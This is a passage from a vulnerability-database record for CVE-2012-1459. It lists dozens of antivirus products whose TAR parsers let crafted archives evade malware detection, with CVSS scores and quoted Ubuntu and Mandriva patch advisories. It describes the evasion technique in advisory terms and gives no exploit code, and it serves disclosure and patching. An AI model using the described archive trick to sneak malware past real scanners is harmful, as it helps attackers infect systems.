            vendor: "authentium",
            version: "5.2.11.5",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "avg",
            version: "10.0.0.1190",
         },
         {
            model: "bitdefender",
            scope: "eq",
            trust: 1.8,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "clamav",
            scope: "eq",
            trust: 1.8,
            vendor: "clamav",
            version: "0.96.4",
         },
         {
            model: "anti-malware",
            scope: "eq",
            trust: 1.8,
            vendor: "emsisoft",
            version: "5.1.0.1",
         },
         {
            model: "virus utilities t3 command line scanner",
            scope: "eq",
            trust: 1.8,
            vendor: "ikarus",
            version: "1.1.97.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "pc tools",
            version: "7.0.3.5",
         },
         {
            model: "f-secure anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "f secure",
            version: "9.0.16160.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "kaspersky",
            version: "7.0.0.125",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "sophos",
            version: "4.61.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "fortinet",
            version: "4.2.254.0",
         },
         {
            model: "scan engine",
            scope: "eq",
            trust: 1.8,
            vendor: "mcafee",
            version: "5.400.0.1158",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "rising global",
            version: "22.83.00.03",
         },
         {
            model: "v3 internet security",
            scope: "eq",
            trust: 1,
            vendor: "ahnlab",
            version: "2011.01.18.00",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "5.0.677.0",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "nprotect",
            version: "2011-01-17.01",
         },
         {
            model: "nod32 antivirus",
            scope: "eq",
            trust: 1,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "g data antivirus",
            scope: "eq",
            trust: 1,
            vendor: "gdata",
            version: "21",
         },
         {
            model: "security essentials",
            scope: "eq",
            trust: 1,
            vendor: "microsoft",
            version: "2.0",
         },
         {
            model: "trend micro antivirus",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 1,
            vendor: "f prot",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "k7computing",
            version: "9.77.3565",
         },
         {
            model: "quick heal",
            scope: "eq",
            trust: 1,
            vendor: "cat",
            version: "11.00",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 1,
            vendor: "anti virus",
            version: "3.12.14.2",
         },
         {
            model: "gateway",
            scope: "eq",
            trust: 1,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "4.8.1351.0",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 1,
            vendor: "symantec",
            version: "11.0",
         },
         {
            model: "antivirus \\& antispyware",
            scope: "eq",
            trust: 1,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "panda antivirus",
            scope: "eq",
            trust: 1,
            vendor: "pandasecurity",
            version: "10.0.2.7",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "4.8.1351.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "5.0.677.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "rising",
            version: "22.83.00.03",
         },
         {
            model: "nod32 anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "frisk",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "g data",
            version: "21",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "k7 computing",
            version: "9.77.3565",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "nprotect",
            version: "2011-01-17.01",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "panda security",
            version: "10.0.2.7",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.8,
            vendor: "virusblokada",
            version: "3.12.14.2",
         },
         {
            model: "v3 internet security",
            scope: "eq",
            trust: 0.8,
            vendor: "unlab",
            version: "2011.01.18.00",
         },
         {
            model: "heal",
            scope: "eq",
            trust: 0.8,
            vendor: "quick heal k k",
            version: "11.00",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 0.8,
            vendor: "symantec",
            version: "11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "security essentials",
            scope: "eq",
            trust: 0.8,
            vendor: "microsoft",
            version: "2.0 antimalware engine 1.1.6402.0",
         },
         {
            model: "web gateway software",
            scope: "eq",
            trust: 0.8,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.3,
            vendor: "virusblokada",
            version: "3.12.142",
         },
         {
            model: "linux lts i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "12.04",
         },
         {
            model: "linux lts amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "12.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.10",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.10",
         },
         {
            model: "linux powerpc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux arm",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux sparc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux powerpc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux arm",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "virusbuster",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "13.6.1510",
         },
         {
            model: "trend micro",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "symantec",
            version: "20101.3103",
         },
         {
            model: "opensuse",
            scope: "eq",
            trust: 0.3,
            vendor: "s u s e",
            version: "12.1",
         },
         {
            model: "opensuse",
            scope: "eq",
            trust: 0.3,
            vendor: "s u s e",
            version: "11.4",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "rising",
            version: "22.8303",
         },
         {
            model: "cat-quickheal",
            scope: "eq",
            trust: 0.3,
            vendor: "quick heal",
            version: "11.00",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "pctools",
            version: "7.0.35",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "norman",
            version: "6.6.12",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "microsoft",
            version: "1.6402",
         },
         {
            model: "mcafee-gw-edition 2010.1c",
            scope: null,
            trust: 0.3,
            vendor: "mcafee",
            version: null,
         },
         {
            model: "enterprise server x86 64",
            scope: "eq",
            trust: 0.3,
            vendor: "mandrakesoft",
            version: "5",
         },
         {
            model: "enterprise server",
            scope: "eq",
            trust: 0.3,
            vendor: "mandrakesoft",
            version: "5",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "kaspersky",
            version: "7.0125",
         },
         {
            model: "computing pvt ltd k7antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "k7",
            version: "9.77.3565",
         },
         {
            model: "jiangmin",
            scope: "eq",
            trust: 0.3,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus t3.1.1.97.0",
            scope: null,
            trust: 0.3,
            vendor: "ikarus",
            version: null,
         },
         {
            model: "data software gdata",
            scope: "eq",
            trust: 0.3,
            vendor: "g",
            version: "21",
         },
         {
            model: "software f-prot antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "frisk",
            version: "4.6.2117",
         },
         {
            model: "nod32",
            scope: "eq",
            trust: 0.3,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "emsisoft",
            version: "5.11",
         },
         {
            model: "anti-virus clamav",
            scope: "eq",
            trust: 0.3,
            vendor: "clam",
            version: "0.96.4",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "antivir engine",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "7.11.1163",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.3,
            vendor: "avg",
            version: "10.01190",
         },
         {
            model: "avast5 antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "5.0.6770",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.8.1351.0",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "authentium",
            version: "5.2.115",
         },
         {
            model: "antiy-avl",
            scope: "eq",
            trust: 0.3,
            vendor: "antiy",
            version: "2.0.37",
         },
         {
            model: "engine",
            scope: "eq",
            trust: 0.3,
            vendor: "ahnlab",
            version: "v32011.01.18.00",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-secure:f-secure_anti-virus:9.0.16160.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:comodo:comodo_antivirus:7424:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ahnlab:v3_internet_security:2011.01.18.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:nprotect:nprotect_antivirus:2011-01-17.01:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Suman Jana and Vitaly Shmatikov",
      sources: [
         {
            db: "BID",
            id: "52623",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2012-1459",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2012-1459",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  id: "VHN-54740",
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-1459",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201203-422",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-54740",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. The TAR file parsers of multiple products contain a vulnerability that can prevent malware detection. This CVE may be split if it is announced that the problem also exists in different TAR parser implementations. A third party may bypass malware detection via a TAR archive entry whose length field corresponds to the entire entry plus part of the header of the next entry. 
\nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bit2defender 7. ============================================================================\nUbuntu Security Notice USN-1482-2\nJune 20, 2012\n\nclamav regression\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 11.04\n\nSummary:\n\nClamAV could improperly detect malware if it opened a specially crafted file. \n\nSoftware Description:\n- clamav: Anti-virus utility for Unix\n\nDetails:\n\nUSN-1482-1 fixed vulnerabilities in ClamAV. The updated packages could fail\nto install in certain situations. This update fixes the problem. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n It was discovered that ClamAV incorrectly handled certain malformed TAR\n archives. (CVE-2012-1457,\n CVE-2012-1459)\n \n It was discovered that ClamAV incorrectly handled certain malformed CHM\n files. A remote attacker could create a specially-crafted CHM file\n containing malware that could escape being detected. 
(CVE-2012-1458)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n  clamav                          0.97.5+dfsg-1ubuntu0.12.04.2\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.12.04.2\n  libclamav6                      0.97.5+dfsg-1ubuntu0.12.04.2\n\nUbuntu 11.10:\n  clamav                          0.97.5+dfsg-1ubuntu0.11.10.2\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.11.10.2\n  libclamav6                      0.97.5+dfsg-1ubuntu0.11.10.2\n\nUbuntu 11.04:\n  clamav                          0.97.5+dfsg-1ubuntu0.11.04.2\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.11.04.2\n  libclamav6                      0.97.5+dfsg-1ubuntu0.11.04.2\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n  http://www.ubuntu.com/usn/usn-1482-2\n  http://www.ubuntu.com/usn/usn-1482-1\n  https://launchpad.net/bugs/1015337\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2\n. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory                         MDVSA-2012:094\n http://www.mandriva.com/security/\n _______________________________________________________________________\n\n Package : clamav\n Date    : June 18, 2012\n Affected: Enterprise Server 5.0\n _______________________________________________________________________\n\n Problem Description:\n\n This is a bugfix release that upgrades clamav to the latest version\n (0.97.5) that resolves the following security issues:\n \n The TAR file parser in ClamAV 0.96.4 allows remote attackers to bypass\n malware detection via a TAR archive entry with a length field that\n exceeds the total TAR file size. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459\n http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n d82d78601290e2f6073974170c81841a  mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm\n 80f0475472c0217afd3727019bf27e53  mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm\n c13835eadea8d2af15b628fba3159e8b  mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm\n d7c058fae32f1a081b1d4ca31157df0e  mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm\n 5ad153709c7eb510c2be2e82bfa5ac52  mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm\n 96e3d3f3e9bea802c4109c155c9d1465  mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm \n 203cde43731b63729d1f7f6497033184  mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n b30f5aafd9aaff0a7743fb62f33ccbea  
mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 1508801239427c0ac72734f52cb4451c  mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 92b4c5ca6db656801b5b6ae217c6e171  mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 94fad12df2cc900309087bbda13c826a  mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 8ec166a457d0512479adaaf5f80d487f  mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 19bc2758175bcde28ebf7783d68a9b98  mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm \n 203cde43731b63729d1f7f6497033184  mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf\nOUr1QL5Wsvt3KboLKCdYUhE=\n=1QL7\n-----END PGP SIGNATURE-----\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
